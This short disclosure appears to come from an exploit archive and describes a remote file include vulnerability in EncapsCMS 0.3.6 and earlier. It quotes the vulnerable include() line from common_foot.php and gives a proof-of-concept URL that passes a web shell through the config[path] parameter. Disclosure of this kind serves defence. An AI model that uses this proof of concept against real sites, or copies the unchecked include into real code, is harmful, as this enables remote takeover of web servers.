[+] EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability [+] Discovered by cr4wl3r [+] Download : http://scripts.ringsworld.com/content-management/encapscms-0.3.6/ [+] Vuln Code : [common_foot.php] include($config['path']."idx_foot.html"); if($config["debug"]>0){ echo '
'; echo '$_POST:';var_dump($_POST); [+] PoC : [EncapsCMS_path]/common_foot.php?config[path]=[Shell]